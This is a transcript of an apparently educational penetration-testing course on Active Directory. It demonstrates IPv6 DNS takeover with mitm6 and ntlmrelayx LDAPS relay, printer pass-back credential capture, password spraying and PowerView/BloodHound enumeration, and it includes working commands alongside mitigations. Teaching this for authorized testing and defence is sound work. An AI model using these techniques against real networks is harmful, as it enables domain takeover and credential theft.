Let's talk about IPv6 attacks, and mainly we're going to be talking about DNS takeover attacks via IPv6. And as of right now, this is the go-to attack for me. It used to be Responder, you know, grab the hashes, try to crack them, and then it was SMB relay: if you can't crack the hashes, well, try to relay them. Well, this is just another form of relaying, but it's so much more reliable because it utilizes IPv6. And I'm going to just use my pen for this one; we're just going to kind of talk through this, and you're going to see how terrible I draw, by the way, and then we're going to go right into it and you're going to see how cool this really is. I can't even explain how awesome it is. So, IPv6 attack: if you think about a machine running on a Windows network, we typically run on IPv4, right? And we have the box, and it's typically running IPv4 in the network. Chances are the network's not even utilizing IPv6. If you go look at your computer now and you go into your network adapter properties, chances are IPv6 is turned on, but you're utilizing IPv4 if
you do an ipconfig, just for a Windows example, right? So if we're utilizing v4 but v6 is turned on, who's doing DNS for v6? And the answer usually is nobody; nobody's doing that. So what we can do is we can say, hey, I'm going to set up an attacker machine, we'll give him a smiley face, kind of a smiley face, and we'll, um, we'll take him and we'll listen for all these v6 messages that come through, and we'll say, hey, I am your DNS, okay? I'm gonna spoof the DNS server, so send all your IPv6 traffic to me, and then I'll go ahead and just pass that along for you. The issue here is that when this happens, we can get authentication to the domain controller. So say this is the DC; we could get authentication to the domain controller via LDAP, or we can do so via SMB. So what we can do is we could take, for example, and you're going to see in the example that we reboot a machine; that reboot just triggers an event, that event comes through to us, we can use that machine to log into the domain controller, and it doesn't have to be an admin or anything, and we can get information, a lot of information, out of just that. We could potentially use that machine to create another machine, as you're going to see from a blog example, and we can wait for somebody to maybe log into the network or use their credentials somewhere, and guess what? That comes to us in the form of NTLM, just like Responder, just like SMB relay, and we relay this; we do what's called LDAP relaying. We LDAP relay over to the domain controller with these NTLM credentials, we log in, if it's a domain administrator, to the domain controller, and guess what? We create an account; it creates an account for us. This tool that we're going to use is called man-in-the-middle six, mitm6, and what we're going to do is we're going to use this tool; it's going to do all this for us. We're going to combine that with ntlmrelayx, and it's going to relay into LDAP from our NTLM credentials, and then this tool is going to create, along with ntlmrelayx, is going
to create a new account for us, and it's going to do so many awesome things. So I'm really excited to show it to you. We just have a couple steps we have to do: we have to download mitm6 in the next video, we have to set up LDAPS really quick, which is just a certificate, and then we're going to be rolling. And this is one of the most fun attacks, still very undetected, very hard to detect, and still very, very prominent in networks. So let's go ahead and move on to the next video, get mitm6 installed, and then let's go ahead and see a live demonstration of what this attack looks like.

In order to pull off our IPv6 man-in-the-middle attack, we're going to need to utilize a tool called mitm6, so let's go ahead and grab that tool now. So we're just going to say "github mitm6," like this, and we are looking for the fox-it one right here. Go ahead and grab this: Clone or download, copy that, and then we'll scroll down, look for any dependencies. Looks like it's just a pip install, so we're going to do this here: cd into our opt folder as always, git clone, and paste. Now cd into your new folder, ls here, and we're just going to say "pip install," and we should do pip3, actually: "pip3 install ." And we can usually do period, and that will install the requirements for us. So this will take just a second now to install; I don't believe it's a very long install, and we're already done here. So that is it, so it should just take a second for you. Once you have it installed, go ahead and meet me in the next video when we break it all down and we start the attack.

In order for me to fully show you and allow you to appreciate this attack, we have to do one more configuration to our lab. So what we're going to do is we're going to go into the Server Manager here, and we're going to make sure that we add one feature, which is going to be a certificate. So what we're going to do here is we're just going to go ahead and say Manage, Add Roles and Features, and then we're going to go ahead and
just say Next and Next and Next, and the feature that we're going to add is going to be Active Directory Certificate Services. So we're going to go ahead and just click on this and select Add Features, and then we can go ahead and just Next through everything here, Next, Next, Next. We want the Certificate Authority, or Certification Authority, here, and then we're going to say restart the destination server automatically if required, and then we're going to hit Install. And this should just take a quick second here, so give it a second; if you need to pause, go ahead and pause, and then meet me back once you have your installation completely configured. All right, so let's go ahead and close this and open up this right here with the exclamation; we're going to go ahead and configure. We're going to hit Next and click on Certification Authority here, we're going to hit Next, and Next, Next, and Next, and then we're going to just go ahead and click, uh, SHA-256 is fine; we'll hit Next on this, and then we'll just change this 5 to 99 here, Next, Next, and Configure. So all we're doing is we're setting up a certificate so that we can run LDAP on a secure side, so we're going to run LDAP secure. Now, we could pull off this attack with LDAP, but it's a lot easier with LDAP secure. So now all we're going to need to do is reboot this server. Go ahead and do that; once you've got that done, you're up and running. Go ahead and meet me in the next video and we'll make sure that we can pull off this attack.

So to begin this attack, we need a few things here. We need mitm6, so we're going to go ahead and just say "mitm6," and we're going to say a domain. Now my domain here is marvel.local, so we'll do "-d marvel.local." We'll spin that up, and we're going to just start getting replies coming in from different devices in our network, okay. So from here, what we need to do is also set up a relay attack. So now that relay attack is going to look something like this: ntlmrelayx.py. This should look
familiar. We're going to do a -6 because we're only going to work with IPv6, we're gonna do a -t for our target, and our target is going to be via LDAP secure; this is why we set up that certificate. We could have done LDAP, but most environments have that certificate running, so it's important to do LDAP secure, and we're just going to point this right at the domain controller. So whatever your domain controller IP address is; mine's sitting at .140. For this -wh, we're just going to use a WPAD, so I'm just going to call this fakewpad.marvel.local, and then we're going to do a -l, and I'm just going to call this lootme. Uh, -l is for loot, so if we set up loot, we can dump out some information that'll be useful to us, and we'll see how that works. So let's go ahead and just hit enter on this, and this is still getting some spoof replies, but we're going to speed this along. So I'm going to go ahead and go over to my Windows 10 machine; I'm just going to reboot this sucker, and this is going to allow us to see this in action. What's happening is IPv6 is sending out a reply, right, and it's saying, hey, who's got my, uh, who's got my DNS, and it sends that out about every 30 minutes, I believe. So what we're gonna do is we're just gonna speed it up by shutting the computer down and then restarting it; it's going to actually go ahead and make this go a little bit faster. So we're going to try to authenticate; when we restart, it's going to try to authenticate first as the Punisher machine. You could see this by THEPUNISHER$, and you can see that it's enumerating the relayed credentials. It's going to take a while on large domains; that's fine, and it's just succeeding right now. It's trying to see what kind of privileges it has right now, so it might take a minute, um, and it's dumping any info into the looter. So if we open this up, let's see if there's anything in here right now. We can just go ahead and just say "ls," and there's this lootme folder, so we can cd into lootme, and this
is so exciting. So look at all this here: domain computers, domain, uh, computers by operating system, or just domain computers, domain groups, domain policies, domain trusts, domain users by group. Now, I love this, because we can come in and we can say something like firefox, I want to see the domain users by group, and we can just look at the domain users by group, and I'm right after the domain admins on top of that. You know, when you have a crappy kind of, uh, admin going on, what about the SQL service that we set up, and remember when we put in the description that the password is MyPassword123? Uh oh. You know, people think that these descriptions aren't visible, and look, it's visible to us, and we barely did anything, right? We just succeeded with an account; we succeeded with a computer. The computer was capable of accessing this domain controller via LDAPS, logging into it, and dumping out any useful information to us. That's scary, right? We have all this information in our hands now. We can see who the domain administrators are and the enterprise admins, who all the users are: who do we need to attack in this environment for this to work in our favor? Now let's do one more thing. Let's go ahead and go into our Windows 10 machine, and we're just gonna say "Password" with an exclamation, like this, and you're going to see what's going to happen. So let's go ahead, and my mouse will come back to me, we'll go ahead over here, and here shortly it should attempt to log in as this user, and we'll see if it works. And there it did, and it's so fast; it just blazed through. Let me go ahead and Ctrl+C. So what just happened here? An admin logged into a computer. That's what happened; that's it. And you can see the administrator logged in somewhere on this network, it succeeded, it targeted LDAP, okay, and then it comes through and it tries to make a new user for us. First it sets up an access control list for us, and that's awesome, and then it tries to create a new user, and then it says, hey, adding new user, and here's a
username and here's a password, okay. Now we own this domain, because what it's going to do is it's going to try to go in and it's going to try to grab all this information for us, and it's amazing what we can do. So let's save this information out and just see how it works. Another thing, look at this: let's go ahead and go to our domain controller. If we go to our domain controller here and we go to our users and groups, let's refresh it. This is before the attack; let's go ahead and just do a refresh really quick, if I can find the refresh button, or I'll just refresh from here, and now look: the nfsg-whatever this user is, is now in here, and they're a domain user, but they set up a policy for us to have exclusive privileges with that access control. And what happens is, if we actually Ctrl+C and we just cd .., we ls, it puts this aclpwn restore file here, so we can actually restore the ACL to what it was before, but as of right now it's allowing this user through, and a special ACL that was created with this attack here. So this is a fantastic attack, and this isn't the only thing that it can do; it does so much stuff. I'm going to actually link down below some amazing things that you can do with this, and I want you to read up on this because it's so fantastic. So I'm gonna put this in here, paste this real quick, and just scroll down a little bit and show you this blog post, and this is one of the ones I use all the time. So you could run this mitm6 with what is called delegate access, and say, for example, that you can't get an administrator to work. Maybe this computer succeeds; look at this, ICORP-W10$ succeeds. You could still add a new computer, not just a user, a new computer with a username and password, and you can utilize that to attack the computer that authenticated you; you can impersonate users on that computer that you used to set that up with. It's an awesome attack; it's called delegate impersonation, or delegate access, and it is, um, it's amazing,
so I do recommend checking this out. Again, I'll put this down in the resources below; great blog. So that is it for this attack. In the next video we're going to cover how to actually defend against this attack and what you can do. It's fairly simple, but we'll still cover it. So that's it; I'll catch you over in the next video.

Okay, let's talk through these briefly. In the last video I said the solution is pretty easy; well, that's kind of true, kind of false. The solution is easy if we just go willy-nilly and we disable IPv6. This completely prevents this attack, right? If IPv6 isn't enabled in the network, then guess what, we can't be an IPv6 DNS server because there's nothing for us to do. So, disabling IPv6 can have unwanted side effects, so the recommended thing to do is actually to prevent some of these, so we just define block rules instead of allow rules when we have our firewall. So I've listed those here; you don't have to worry too much about them. This could be something to just copy a picture of and have for your notes, especially if you're studying up. I don't think you'll ever be asked this in an interview, but if you're ever pulling off this sort of attack, it might be good to know for a client purpose. Another thing to note is that if we're not using WPAD, then we should disable it with group policy, and this tells you just how to do that. And then the relaying: so we did relaying to LDAP and LDAPS, and we only can mitigate this by enabling LDAP signing and channel binding, so that's another mitigation strategy here. So we could have prevented the LDAP attack that you saw, but typically LDAP signing and channel binding are not enabled by most clients; I can't remember a time that I've seen it. So, last thing to consider is that we can put users into the Protected Users group, and that would prevent impersonation or delegation, which we didn't actually cover a delegation attack, but I did show you that blog posting where it had the delegate access. If we're able to do delegate access against
a machine, then we can, you know, just abuse that feature even more. And so to fully disable this, there's a few different things that we have to do. We can cut the head off by disabling IPv6, but best practice says, hey, you know, we should actually just do some block rules in the firewall, we should disable WPAD, we should disable, or enable, LDAP signing and channel binding, and we should consider moving our admin users to the Protected Users group. So with this being said, again, don't worry too much about this; I just like to cover the mitigation strategies, to talk about it. If you want to practice this in your lab, if you want to go back as we're going through some of these and you want to turn off different things that I'm showing you in defenses and try to mitigate these, I say more power to you. See how this works and how it affects certain attacks; I think that's a really awesome strategy as well. But otherwise, just take maybe a screenshot of this and don't focus too much on memorizing it. So from here we got one more video left; we're going to tie everything together, and then we're going to get into post-exploitation enumeration. So I'll catch you in the next video.

Let's talk about one of my favorite attacks, and this is a classic that goes back to printers and even IoT devices, and you still see it occasionally in networks. It's really a bug that has to do with a printer or a different kind of device, and when we get into it you'll be like, whoa, I've seen that before, most likely, if you've done any sort of IT work. And this attack is pretty epic, honestly. And I, I recall a time where I was scheduled to do a pen test, and it was an internal pen test, and the company I was working for, for some reason, scoped an internal pen test for four hours. So literally I had four hours to attack a network and get domain admin; that's all I was allowed. And I was on this network and realized pretty quickly that there was not much going on. The network was like a hybrid Active Directory network; there
wasn't any Responder, any capturing of hashes in the traditional way. However, there was a printer sitting out there with default credentials on it, and there were two setups going on. Um, there was an SMB share user; basically this SMB user will scan files to a folder, and you can think of that like if you go to a printer and you just go scan a file and it ends up in a folder on a share, exactly what's happening. Now, those are common, and those can be set up with strong credentials; it could be set up to not be a domain admin or have any sort of administrator rights whatsoever, except for just writing to that folder. That's a proper setup, and they actually had this set up properly, except for some reason they also had the CEO's credentials in there, okay, and the CEO's credentials were sitting in there as an LDAP connection, for some reason, I don't know why. Anyway, I was able to grab those through this attack, compromise that, because he was a domain admin, of course, send them all kinds of wonderful pictures from their accounting software, their finance, the CEO's email, all kinds of fun stuff, all because of a default printer password and a little bit of fun through an old technique. So let's take a look at the technique, now that I've kind of gone through a little bit of story time. So I'm gonna scroll down on this web page, and I'll put this in the resources, but basically we're looking for access to something that connects to LDAP, or something that does like an SMB connection, or something along those lines that we can utilize. So what's going on here, if you can see this picture, and this is really hard to demo in the lab, so this is kind of a sit back and enjoy, because there's not really a good way to say, hey, go buy this specific printer and let's go set this up. Basically what's going on is we have, what is this, an LDAP sign-in setup. You can see it's trying to sign in here, do a setup. A lot of times on these pages where you have the connection, you may have something where there's an IP address sitting
in here, and then there's a username and maybe even a password with a lot of asterisks put in it. I see that a lot, where there's just nothing but asterisks in there and you can't see the password; it's hidden. You can't, like, uh, try to get in there with viewing the source or doing any sort of weird stuff, although I've seen that before too; usually it's pretty well protected. However, with this little LDAP here, if you change this from the domain controller, which is likely where it's pointing to, or the LDAP server, and you change it to your IP address, your attacker IP address, and you set up a listener, now they show you with netcat. Netcat is fine; you could totally use netcat. You can also use Responder, so if you do spin up Responder and you have it listening, this will also capture it. But look what happens: what happens is the password gets sent over in clear text. So you have "printer admin service," is what the account name is; you can see all the way across, and then you see the password. Doesn't matter how long, how complex the password is; you can utilize that and grab the password in clear text. Amazing, amazing, amazing thing, um, and wicked bug that's still out there. They're showing another example here with SMTP; you can see the password right here. I'm going to make this a little bit bigger, but you can see right here where it's all asterisks, right? Doesn't matter; you can point that to yourself and capture that as well. They have all kinds of ways to do this, so I'm going to share this article. Think about the pass-back attack. I've been in situations where I have literally been on engagements and there's nothing else out there except printers that I can somehow log into, and you never know what's going to work out for you. Uh, the weirdest little default credential could open up a Pandora's box and get you into all kinds of mischief and fun. So don't forget about the pass-back attack when you are doing your Active Directory or internal pen test engagements. So before we wrap
up this initial attack vectors section, I want to talk about the attack strategies that you might use when you're just starting out. Now we know all the attacks; how do we piece it together? And my thoughts are that we begin the day with mitm6 or Responder, and we sit there, and we've talked about this in the previous videos, but we want traffic to be generated, right? We need those users coming in, so 8 a.m. is a good time, when users are starting to come in, or even after lunch, when they're starting to log back in. You're going to have to run both of these on an assessment, because you're going to have to assess for LLMNR in the network and you're gonna have to assess for IPv6 in the network. So either one is fine. If you're looking for, like, a quick win, mitm6 is probably faster nowadays, but I still like to start out with Responder to see how well the network is responding to us, right? Are they giving us hashes? Are the hashes easy to crack? If so, that's going to tell me that we're probably in for an easy assessment. If I'm not seeing LLMNR enabled, then I might be in trouble here; they might have had a pen test before, or they might, you know, know some of the common attacks and have already prevented against that. So when you run those, you're going to go ahead and run your scans to generate your traffic. Now chances are that you're going to be running a Nessus scan to do this; you might also be running an nmap scan of some sort to get quick results as well, but most places run Nessus. Now, if your scans are taking too long, if you have a big network, which it can happen, what I like to do is I like to just look for websites that are in scope. And this is another thing that we can do if we're trying to be quiet, as opposed to just, like, running scans: if your goal is to be quiet in the network, something that you can do is you can sweep the entire network for websites, okay. And I look with a tool called http_version; it's just a module that you can search in
Metasploit, and you just say, hey, here's my range, I want to look and see if anything responds to http_version. When I send out an HTTP request from my computer, I want to see if anything else responds to that, and that's going to be less likely to get picked up, because you're making traffic on 80 and 443, which is very common, right, as opposed to port scanning every single device in the network, which is going to get picked up pretty easily by a good SIEM. So from here, what can we do? Well, we take those websites in scope and we can look at those logins, and we can check those logins for default credentials, and some of the things that we're looking for are like printers. I have gotten domain admin off of a printer more than one time. So if you think about a printer, what does a printer have a feature of? Typically it has a scan feature, and that scan feature is a scan-to-computer feature, right? Well, a lot of times an admin will make that user that has to be able to scan from the printer to the computer via SMB, they'll make that user domain admin, and that's overly permissive, and what we can do is we can go in and we can dump those credentials in clear text, get what the passwords are for the SMB user, or they might even be using individual user accounts. There's so many different things that they do, and I've seen weird varieties, but printers are a big one, and a lot of people don't secure their printers because they're just like, it's just a printer, why do I need to change the password on it? But it's a really big one to start thinking outside the box on. Uh, Jenkins instances: if you have any developers, Jenkins sometimes is wide open; you can use that to get a shell on their machine as well. And there's just a lot of different things, so you're going to look through the web logins. If you see some sort of login, go research that page, look up what the default credentials are, look up if there's any known vulnerabilities for what's running, and just enumerate that network, okay. So while we're looking
for initial attack vectors, we're looking for hashes with Responder, we're looking to get that loot back from mitm6, or maybe even strike gold and get an account created on the domain controller right away. And if that happens, if you get domain admin in like two hours and you're sitting there for a 40-hour assessment, guess what? Chances are you're probably gonna have to go back and try it a different way and find as many paths as possible. So just keep thinking about how you want to do that, but look for Responder, look for mitm6, look around the network and sweep around with your nmap, and look for any SMB that's open with SMB signing disabled, and start picking out targets for your SMB relay attacks as well. So maybe that's something you might attempt in the afternoon: you try to capture hashes in the morning and then you start relaying hashes in the afternoon, and you can spend just one day doing that and then spend another day focusing on mitm6. You want to give your client the best comprehensive coverage that you can, and try to find all the low-hanging fruit if it's their first assessment, or try to find those unique ways in if it's not their first assessment. So remember, it's a timed assessment; we only have so much time. If it's a really, really bad environment, then we need to get all the critical findings out of the way. If it's a tougher environment, it's been pen tested before, it might take us all 40 hours to find any way in, or we might not even find a way in at all, and that's okay as well. So the last thing I want to say is to start thinking outside the box. So when you have an environment, sometimes you're going to run into weird things. I've run into environments where there was no SMB; I've run into environments where there was no LLMNR, and you just have to start looking around at what's available to you. And one story that I can think about is that I was in this very small medical environment, and there was maybe
20 machines and there was no SMB in this network no LM and R I could not get leverage anywhere and then I found by listening in the middle I found some clear texts coming through on a password okay the password was going for IMAP and the IMAP was just running in clear text and I took that password and I started passing that password around and I got into a phone system and in that phone system I had the ability to change some stuff I could change you know where the phones were redirected and forwarded and then I started thinking okay well what can I do with a phone system so I started looking at their Microsoft Outlook and their Outlook had a password reset functionality the password reset functionality went to their office phones guess who controlled the office phones I did so what if I said I want to reset the user somebody I know that's an admin I want to reset their password and with that reset I want to forward that to my phone instead of the office phone is going to so when it rings up I say yeah I'm the user here's my here's my code or token or whatever they send you and go ahead and let's change that password and you bypass the multi-factor authentication there so thinking outside the box is a big one you're going to run into situations where these initial attack vectors might not work for you and just enumerating and seeing what's out there is the most important you might not have a situation where responder works or man in the middle six works or SMB relay works you might have to look at what ports are open on these machines you might have to look around and really focus the websites first that's my big one if you're struggling focused websites and just see what's out there and try to get your leverage in start thinking outside the box and just enumerate enumerate enumerate the more you enumerate and I've been harping on on this the entire course the more you enumerate the better attacker you're going to be don't just focus on the exploit focus on as much 
information as you can gather and you're going to be super successful so that's my Spiel for this we're going to go ahead and move into post-compromise enumeration we're going to talk about using Powershell a tool called Power view and we're going to talk about Bloodhound as well we'll do a little bit enumeration and then we'll get into some post compromise attacks and that's where a lot of the real fun begins and we can start leveraging some of the stuff we've done in this section and really utilizing that to move upward so so far we've kind of just moved laterally we're going to start moving upward now and really take over that domain admin learn some cool tools and techniques and then we'll be well on our way in the course so I'll catch you over in the next section so we have compromised a user account and the initial attack vectors section we managed to capture Frank Castle's hash right with responder we took that hash offline and we said Hey look it's password one and we were able to also get on to machines with SMB relay without ever having to capture hash we were able to dump the Sam file and collect hashes that way and we also were able to create an account with man in the middle six and pretty much own the whole domain as it was so we have a few different compromises that we can play with and from here we're going to take a pause we're going to go ahead and look at what we can do once we have a compromise and how we can enumerate the network using these compromises so we're going to look at two tools specifically we're going to look a tool called Power view now Power view is a tool that allows us to look at the network and look at enumerate basically the domain controller domain policy domain users groups a lot of different things it goes very very deep with what it's capable of doing and again that's a Powershell tool and we're also going to look at a tool called Bloodhound Bloodhound is going to allow us to look actually visualize in a graph form what is 
going on in the domain, in the network, and where can we find the sensitive user that might be logged in, or where can we find the shortest path to getting domain admin. It's a fantastic tool, it should be used on every internal assessment that you do, and I think these two tools will really set you apart when it comes interview time, being able to talk about them and know how to use them in an assessment. So from here we're going to go ahead and move on. We're going to start talking about how to install PowerView, use PowerView, and then we'll move into BloodHound, and then eventually we're going to move into these post-compromise attacks once we have all this information in front of us. So let's go ahead and move into the next video, where we install PowerView.

So the first tool up that we're going to use is PowerView, and in order to use PowerView we're going to have to install it. So what I want you to do is go ahead and just go to Google and search for PowerView GitHub, and you'll be brought here to PowerView at master in this PowerTools one, and it's going to say it's deprecated. That's fine. You could also go to the PowerSploit repository that they have here, and you can download PowerView right there. So your best bet is either to just download all of these if you want, or you can just click on PowerView by itself and download just this file. I'm going to just download just this file. You can go into raw and copy it, or copy the path, and either way what I want you to do is go ahead and take this file and bring it over to one of your Windows 10 machines, it doesn't matter which one. The situation that we are having here is that we're going to run PowerView, which is a PowerShell type script, and we're going to run it and do enumeration with it. We're going to see what it can do for us; however, we're going to run it directly from the machine. Now in an attacker situation, say we have access to a shell, then we'll use that shell and we're going to load PowerShell and we'll upload this file, for example, and then we'll still run PowerView. The nice thing about running it on our machine here is just that it allows us to kind of auto tab complete, which we won't have, and it'll just make things a little bit smoother. So in a realistic scenario you're not going to be on the machine on like an RDP session. You might be, but chances are you're not going to RDP into most machines. But if you can get RDP access and you know it's a machine that a user is not using, like a server or something that's just sitting there, and you have RDP access to it, then feel free to log in and do it this way. But for now this is just the best way to demonstrate. So go ahead, I have it sitting in my downloads folder, you can put it wherever you want, and then we'll go ahead and just kind of go from there. So meet me in the next video once you've got PowerView put onto your machine, and we'll go ahead and start enumerating the domain using PowerView.

All right, so the first thing I want to do is just load up a command prompt, and we'll go ahead and do that. I'm going to change directory to my downloads folder because that's where I have PowerView, and then the first command we're going to run is powershell, and then we'll do -ep, that stands for execution policy. You can also write it out like this, -ExecutionPolicy, but I just like doing -ep because it's shorthand and it still works. So we're just going to say execution policy bypass, and this bypasses the execution policy. Now something to note about execution policy is it's not for security purposes, right? The reason that execution policy exists is that it's just there to stop us from executing scripts that we don't want to, you know, like accidentally executing a script. So we're specifically saying, hey, just go ahead and shut that off. So we're going to bypass it here with powershell -ep bypass, and this is pretty common, you're going to see this a lot if you utilize PowerShell. So the next thing we're going to do is call our program, and we're going to do that by doing this: we're going to say dot and then dot backslash, like that, . .\, and you can just start typing in powerview.ps1, auto tab, hit enter, and now that's going to happen. Nothing's going to show or tell you okay, it's just, hey, you've loaded it. So PowerView is an incredibly powerful tool. We can do so many things, and what we're going to do with it in this course is only going to scratch the surface. So my recommendation to you is to go and read up on it. I will put a reference down in the description below where you can find a cheat sheet, and then the rest is going to be up to you for Googling and finding out what more it can do. At the end of this course, or the AD portion of the course, I'm going to provide some additional references in terms of Active Directory security and blogs and certifications and courses that you can take, and all of those will cover PowerView in a much deeper level. But these are just some of the high level things that you should know when it comes to enumerating a domain and how PowerView is powerful. So let's go ahead and look at our first command. Our first command is going to just be Get-NetDomain. What is this going to do? This is going to get information for us about the domain. So go ahead and hit enter on that, and you can see that we have a forest and it's marvel.local, we have a domain controller here of HYDRA-DC.marvel.local, and that's all it tells us. We have a very simple domain, but if we were in a complex domain this would be a little bit more interesting to us, just to kind of know what's going on, where are the domain controllers. And if we want to see specifically what domain controllers are there, we can say Get-NetDomainControllers, like this, or Get-NetDomainController I should say, and hit enter, and then it'll tell you, hey, the domain controller is right here at 192.168.57.140
and the domain controller's name is hydra-dc.marvel.local. So it gives you information specifically about the domain controller, and some networks have multiple domain controllers, and this would provide all that information about those domain controllers. But you now know. Say before you had no idea where the domain controller was in your network, you've done some scanning but you really weren't able to identify it, you got your exploit in on a machine, you logged in, you dumped PowerView on that machine, and now you know the domain controller, you know where to target next or where your end goal might be. So that's just two quick examples. More examples: we could say, hey, let's get the domain policy, and this will show you all the different policies in the domain. For example, we can look at the Kerberos policy, the system access, etc. So let's take a look at the system access. We can do something like this: in parentheses go ahead and just type in Get-DomainPolicy, like that, and you should be able to auto tab it, and then put a dot and just say "system access", like this, and then hit enter. And what is this telling us? Well, this tells us a little bit about the policy here. So we can see that the minimum password age is one day, the maximum password age is 42, we have a lockout count of zero, meaning it's not set, password complexity of one. So you can look through here and just see, like, what's the minimum password length? Seven. Okay, so now I know that the minimum password length is seven. I'm going to go ahead and just spray seven character passwords, or, you know, it should be pretty easy to crack a lot of passwords in a network where it's seven, but you should be able to spray passwords across that network that are pretty weak and probably gain access to some user accounts. So this is a very good indicator of what you're up against, and it's super nice just to have access to these different policies and what to look at. Same thing with Kerberos: you could look at the ticketing age and just see how long a Kerberos ticket lasts, and you will get more into that when we get into golden tickets, but just something to keep in mind on the Kerberos side as well.

So from here we could also look at users. One command that you can run, just for the sake of showing it to you, is Get-NetUser. Now this one's going to be a little dirty, okay? So now we're here and we just dumped this big long list of all the users, and it looks dirty. We can pull down all the users here, and it's interesting if we want to take our time and kind of read through this. You could see, okay, well here's Frank Castle, and it's Frank Castle, marvel.local, here's his name, here's the samaccountname right here, which is fcastle. You kind of read through these, and maybe if you look through these you might be able to look at the descriptions and find an interesting description here with a password in it, which we do have, like this one here: description, "Password is MYpassword123#". So this is another way to compromise an account, by just viewing the descriptions here. We did that with mitm6, but this is just another way to do it. Now we could do something like this, because, like, you see how dirty this output is with just seven or eight users; imagine an enterprise network where there's hundreds of users, that would take forever. So we could say something like select cn, and that will just pull down all the usernames, or all the users, or we could do samaccountname instead, like select samaccountname, and just pull down the account names here. If you wanted to try to get the descriptions we could do select description, and you can see the "Password is MYpassword123#" and be like, hmm, where did that belong? So a quick, dirty way just to kind of sort through these users and find out a little bit of information about them. And we could look at certain things on here too, like when was the last user logon, how many bad password counts do they have, what is their user account control, or their RID number, which 500 would be the admin, right? And we can just go through all this information and kind of look through it and pick apart anything that might be of interest to us, and we'll talk about some of these features here in just a second and why they might be interesting. So let's talk about, and shift actually on this to, user properties. So we could say Get-UserProperty, and this is going to show you all the properties that a user might have, and we just discovered all of these; these are exactly what's through and through on these user accounts, right? But let's say, for example, go ahead and just tab up, let's just say we want to get the properties of pwdlastset. Okay, we can look at the different users and when their password was last set, and that might be useful. We can know, okay, there's an old stale password out in the network, or these password accounts are new. Like you see the administrator password was the last one changed on 11/30, and then the newer users from the mitm6 attack were on 12/9, and you can kind of just look through this. Same thing, like you could look at, for example, logoncount, and this is a good way to actually identify honeypot accounts. So you want to be able to see how many times this user has logged in, and if you see an account that has never logged in before, that might be a honeypot account. You might not want to try to attack that account, you might want to avoid that completely, because they might just be letting that sit there for you to capture, and then once you capture it, it's going to alert their system. So think about that as well. These properties can be incredibly useful. You could also look at, like, the badpwdcount and just see who's been entering in bad passwords, and if there's one there that has like hundreds of them, you know, you could see that it's maybe been under attack if you're an administrator, for example. So there's all kinds of useful information. I recommend that you just kind of play through this as well and go back and look at some of these in here and just say, okay, how can I sort through this and what might be interesting to me? Again, reading the reference guides that I put in the references is going to be super important as well.

So from here let's talk about computers. Just like getting the users, we can also get the computers in the domain. So we can just say Get-NetComputer, like this, you should be able to auto tab (I screwed up "computer") and hit enter, and okay, it'll list out here all the computers in the domain. We only have three, which is useful; if this were a bigger domain there would be much more. Now that's not a lot of information there, so if we want more information we could say -FullData, like this, hit enter, and then we get probably too much information. But we can come through here and look at it, like here's Spider-Man's machine, you could see the last bad password time, you could see a logon count, you could see a lot of information here like what's the operating system, and you can start to identify operating systems if you want, or you could just sort these out. Like, for example, if you tab up
you could just say select operatingsystem and sort. So select is just like grep, right? You're just pulling down specific information. So select operatingsystem, and then you can see, okay, well I've got one Server 2019 and two Windows 10 machines in here. So that way you can start picking and pulling apart what are the servers in the domain and what are the Windows 10 machines, or what are the user machines, and kind of start separating them out and getting that information.

So from here we can also look at groups. So for example we could say Get-NetGroup, which is going to output quite a bit, and these are all built-in groups, we haven't made anything new. But we could look through here and see if there's any interesting groups for us. Because we haven't done anything new it's really not going to be interesting, but we can sort through this and say, what about getting that group by group name? And we just say -GroupName "Domain Admins", okay, and then we'll pull down any of the domain admins this way. Or we can actually sort too by just a wildcard: instead of specifying all the admins here, what if we just say *admin*? What do we say? We want to know specifically what admins are out there. So there's Administrators, Hyper-V Administrators, Enterprise Admins, Domain Admins, Key Admins. So you can look for all the admin group names as well. And we can get the members of these groups if we want, so we can say Get-NetGroupMember and then we're just going to go ahead and say -GroupName, and we can pick one of these groups, we could just say "Domain Admins" again. So this will list out all of our domain admins, so we know that SQLService, tstark and Administrator are all domain admins in our network. So useful information to have here as well.

So a couple more things I want to point out. There is a tool in here called Invoke-ShareFinder. This is a nice one because you can look and find all the SMB shares in the network, you can see what files are being shared and where they're being shared. So we know about ADMIN$, C$, IPC$ on every machine, but what about this share here that we have? And then hackme came up, right? So it's good to look through these shares and see if there's anything of interest and identify potential interesting shares for us. And then two more I want to show you, well, really one more in two different ways. So let's look at this: we're going to type in Get-NetGPO. So this is going to show us all the group policies. Now I added a special one in here just to show you that we can pull down a bunch of them, but so look, it's going to look interesting, it's going to pull down that heavy data again and sometimes it's overwhelming, but we can see like Disable Windows Defender, that's one we added in there, right? And then I added in Disable SMB Signing, even though we didn't have to do that, I just added that one in to show you a few more in here. So let's say we want to select something on here. I like to do this: I like to select displayname, and I also like to select whenchanged, and that'll show us, okay, here's the display name. So it gives us an idea of what's going on. So we know that there's default domain policies and then we've got a Disable Windows Defender, Disable SMB Signing, so we know that that's going on in the network, and we can learn about their policies that are going on and just collect more information, and then we can learn when these were changed in the network, right? So it's important to just dig in and get as much information as possible. Now this may have been overwhelming, this may have been a lot, and it may have gone really quick. My advice is probably to go back and watch this one more time, play around with this, or just look at your notes, play around in here and take good notes on what you did, and you can go to the references and pull down more information and see how you can utilize that in the future. I think this is one of the greatest tools you can use for enumeration. So once we're on a machine, we want to enumerate the network. This is a great way to do so, and you can see how quick we can get information about the domain, the domain policies, users, user properties, computers, groups, group policy. It could do so much more than what I showed you, but this is a really good baseline for you to understand and know about. So that is it for PowerView. From here we're going to go ahead and move on to a tool called BloodHound, which is incredibly fun to use, and you're going to see how beneficial it can be. So we'll have a high level overview of BloodHound and then we'll move on into our next section.

Welcome to this video on installing BloodHound. So BloodHound is a tool that's going to download the data, essentially, of Active Directory. Once we're on a machine or on a network, it's going to be able to download the data for us, and what it's going to do is visualize that data in a graph. So we're going to be able to identify a lot of information about a network very, very quickly, where it could take us a long time otherwise to, you know, attempt this and try to figure out all these complex paths that you might be able to have in a network to get to a domain admin. BloodHound figures that out really quick for you. So this was developed by the team over at SpecterOps, and that's wald0, harmj0y and CptJesus. They're a great team. Actually, one of the references you're going to have, blog references, is going to be for harmj0y here at the end, so I recommend reading their material, because they are the Active Directory gurus, among other people in this field. So installing BloodHound is fairly straightforward here. We're going to go ahead and just say apt install bloodhound on our Kali machine, and it's going to be 353 megabytes of additional disk space. What does that mean? That means this is going to take a while. So go ahead and pause the video, let this do its install, let it do its thing, and then meet me back once you're all set up and ready to go, and we'll continue on with the instructions.

